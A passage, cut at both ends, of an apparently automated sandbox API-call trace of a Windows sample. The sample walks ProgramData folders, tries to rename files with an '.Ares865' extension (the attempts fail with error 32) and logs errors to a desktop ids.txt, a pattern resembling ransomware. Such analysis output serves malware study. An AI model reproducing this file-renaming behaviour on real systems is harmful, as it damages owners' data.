(hObject=0x0) returned 0 [0045.623] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0045.623] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0045.624] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2528 [0045.756] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 185 [0045.756] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.756] GetLastError () returned 0x20 [0045.756] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 207 [0045.756] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 207 [0045.756] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.757] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc13 [0045.757] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xcf, lpOverlapped=0x0) returned 1 [0045.757] CloseHandle (hObject=0x164) returned 1 [0045.758] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.758] CloseHandle (hObject=0x0) returned 0 [0045.758] CloseHandle (hObject=0x0) returned 0 [0045.758] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0045.758] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 192 [0045.758] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.759] GetLastError () returned 0x20 [0045.759] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 214 [0045.759] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 214 [0045.759] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.759] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xce2 [0045.759] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xd6, lpOverlapped=0x0) returned 1 [0045.759] CloseHandle (hObject=0x164) returned 1 [0045.760] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.760] CloseHandle (hObject=0x0) returned 0 [0045.760] CloseHandle (hObject=0x0) returned 0 [0045.760] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0045.760] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0045.760] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2548 [0045.802] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 202 [0045.802] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.802] GetLastError () returned 0x20 [0045.802] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 224 [0045.802] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 224 [0045.802] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.802] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xdb8 [0045.802] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xe0, lpOverlapped=0x0) returned 1 [0045.802] CloseHandle (hObject=0x164) returned 1 [0045.803] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.803] CloseHandle (hObject=0x0) returned 0 [0045.803] CloseHandle (hObject=0x0) returned 0 [0045.803] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0045.804] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 209 [0045.804] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.804] GetLastError () returned 0x20 [0045.804] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 231 [0045.804] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 231 [0045.804] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.804] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe98 [0045.804] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xe7, lpOverlapped=0x0) returned 1 [0045.804] CloseHandle (hObject=0x164) returned 1 [0045.805] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.805] CloseHandle (hObject=0x0) returned 0 [0045.805] CloseHandle (hObject=0x0) returned 0 [0045.805] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0045.805] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0045.806] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2568 [0045.844] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 219 [0045.844] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.844] GetLastError () returned 0x20 [0045.844] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 241 [0045.844] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 241 [0045.844] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.844] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf7f [0045.845] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xf1, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xf1, lpOverlapped=0x0) returned 1 [0045.845] CloseHandle (hObject=0x164) returned 1 [0045.847] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.847] CloseHandle (hObject=0x0) returned 0 [0045.847] CloseHandle (hObject=0x0) returned 0 [0045.847] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0045.848] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 226 [0045.848] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.848] GetLastError () returned 0x20 [0045.848] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 248 [0045.848] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 248 [0045.848] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.848] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1070 [0045.848] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xf8, lpOverlapped=0x0) returned 1 [0045.848] CloseHandle (hObject=0x164) returned 1 [0045.849] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.849] CloseHandle (hObject=0x0) returned 0 [0045.849] CloseHandle (hObject=0x0) returned 0 [0045.849] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0045.849] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0045.849] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2588 [0045.871] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\* FindFirstFile error 3\r\n") returned 292 [0045.872] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\* FindFirstFile error 3\r\n") returned 292 [0045.872] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0045.872] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1168 [0045.872] WriteFile (in: hFile=0x120, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0045.872] CloseHandle (hObject=0x120) returned 1 [0045.873] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0045.884] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 236 [0045.884] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.884] GetLastError () returned 0x20 [0045.884] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 258 [0045.884] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 258 [0045.884] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.884] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x128c [0045.885] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x102, lpOverlapped=0x0) returned 1 [0045.885] CloseHandle (hObject=0x164) returned 1 [0045.887] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.887] CloseHandle (hObject=0x0) returned 0 [0045.887] CloseHandle (hObject=0x0) returned 0 [0045.887] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0045.887] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 243 [0045.887] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.888] GetLastError () returned 0x20 [0045.888] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 265 [0045.888] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application 